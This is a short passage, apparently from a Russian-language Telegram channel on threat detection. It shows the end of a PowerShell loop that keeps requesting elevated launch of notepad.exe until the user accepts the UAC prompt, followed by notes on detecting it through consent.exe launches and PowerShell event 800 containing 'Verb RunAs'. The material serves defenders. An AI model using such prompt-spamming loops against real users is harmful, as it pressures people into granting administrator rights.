        Start-Process notepad.exe -Verb RunAs -ErrorAction Stop
        break
    } catch {
        Start-Sleep 1
    }
} while ($true)

🔭Обнаружение:

🔤Запуск consent.exe более одного раза, будет сильно фолсить
🔤Для powershell отслеживаем
Provider="Powershell" AND Eventid=800 AND EventData contains "Verb RunAs"

#detection@detectioneasy
#ttp@detectioneasy